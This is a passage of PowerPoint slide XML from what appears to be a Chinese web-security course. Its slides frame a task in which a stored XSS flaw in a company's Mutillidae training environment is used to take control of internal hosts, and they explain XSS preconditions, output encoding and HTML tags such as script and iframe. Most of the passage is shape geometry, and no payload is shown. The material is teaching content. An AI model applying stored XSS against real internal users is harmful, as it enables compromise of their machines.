          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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9" name="AutoShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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0" name="AutoShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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1" name="AutoShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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2" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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3" name="AutoShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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4" name="AutoShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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5" name="AutoShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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7" name="AutoShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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8" name="AutoShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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3" name="AutoShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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5" name="TextBox 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3123945"/>
            <a:ext cx="5697855" cy="1029335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="14002" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>任务实施</a:t>
            </a:r>
            <a:endPar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56" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2581275"/>
            <a:ext cx="762000" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="85725">
                <a:moveTo>
                  <a:pt x="719074" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42799" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="762000" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074"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57" name="TextBox 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124195" y="1904999"/>
            <a:ext cx="1943608" cy="575310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>PART05</a:t>
            </a:r>
            <a:endPar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58" name="AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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7" name="TextBox 7"/>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zh-CN" alt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任务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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实施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1600200"/>
            <a:ext cx="10400030" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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通过前面的扫描，你发现了某公司的训练页面其中的一个训练环境Mutillidae 存在存储型的跨站漏洞，你觉得这是一个很不错的利用点，可以让某公司内部网络的主机通过访问这个存储型的跨站漏洞而达到控制公司内部个人主机的效果。</a:t>
            </a:r>
            <a:endParaRPr sz="20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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>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zh-CN" alt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构造XSS脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1066800"/>
            <a:ext cx="10694035" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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脚本(Script)在各种浏览器版本中广泛使用，目前绝大多数网站都使用JavaScript(也有的使用VBScript)用来进行计算、管理Cookie等工作，这些脚本运行在客户端上，而不是服务器上。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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对一个用户本身而言，JavaScript代码的执行效果和一个普通的静态HTML页面没有任何区别，因此如果没有XSS漏洞，JavaScript能够非常好地增加网页的丰富多样性，增进用户的体验。但漏洞总是会有的，拿XSS漏洞来说，其实就是一种没有对输入进行验证的漏洞。想执行一个成功的XSS攻击，需要两个步骤：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1)攻击者发送给Web应用数据没有被过滤或是删除；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2)Web应用返回的数据没有经过编码。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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所以对于一个安全的Web应用来说，返回的页面对一个特殊的字符包括&amp;、&lt;、&gt;、”、’和/都应该进过编码，最好是进行十六进制的编码。OWASP给出如何防止XSS的指南，给出哪些需要进行防护的字段等，具体信息可以查看网址https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet。</a:t>
            </a:r>
            <a:endParaRPr sz="20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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>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zh-CN" alt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构造XSS脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1676400"/>
            <a:ext cx="10694035" cy="3322955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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常用HTML标签如下：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;iframe&gt; 创建包含另一个文档的内联框架 </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;textarea&gt; 这个标签定义多行的文本输入控件 </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;img&gt; 向网页中嵌入一副图像 </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;scirpt&gt; 这个标签用于定义客户端脚本，比如JavaScript  这个标签既可以包含脚本语句，也可以通过src属性指向外部的脚本文件。必须的type属性规定脚本的MIME类型  JavaScript 的常见应用是图像操作、表单验证及动态内容更新。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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1.常用HTML标签</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8877300" y="5857875"/>
            <a:ext cx="3314700" cy="1000125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3314700" h="1000125">
                <a:moveTo>
                  <a:pt x="3314700" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="1000124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700"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3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9186926" y="5424551"/>
            <a:ext cx="3005455" cy="1433830"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3005454" h="1433829">
                <a:moveTo>
                  <a:pt x="120209" y="1433448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89849" y="1374297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="1332494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="1289692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="1245945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="1201308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="1155837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="1109588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="1062616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1014976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="966724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="918471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="870831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="823859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="777611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="732142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="687507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="643761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="600960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89849" y="559160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110002" y="518416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131985" y="478782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155744" y="440315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181223" y="403070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208367" y="367101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237120" y="332466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267427" y="299218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299233" y="267413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332481" y="237107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367117" y="208355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403086" y="181213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440332" y="155735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478799" y="131977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518432" y="109995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559177" y="89843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600976" y="71577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643776" y="55254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687520" y="40926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732154" y="28652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777622" y="18485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823868" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870837" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="918474" y="1182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966724" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005074" y="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 name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110680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 name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090612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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107346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 name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105727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 name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429875" y="5648325"/>
            <a:ext cx="19050" cy="419100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19050" h="419100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102393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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="2908195"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="0" y="1092304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1044230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="996637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="949562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="903040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="857107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="811799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="767150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="723198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="679978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="637525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="595875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="555064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="515128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="476102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="438022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="400924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="364843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="329815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="295876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="231408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="200950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="171723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="143764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="117109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="91792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="67849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="45317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="24231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="4626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709549"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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="4000500"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="709549" y="1092410"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
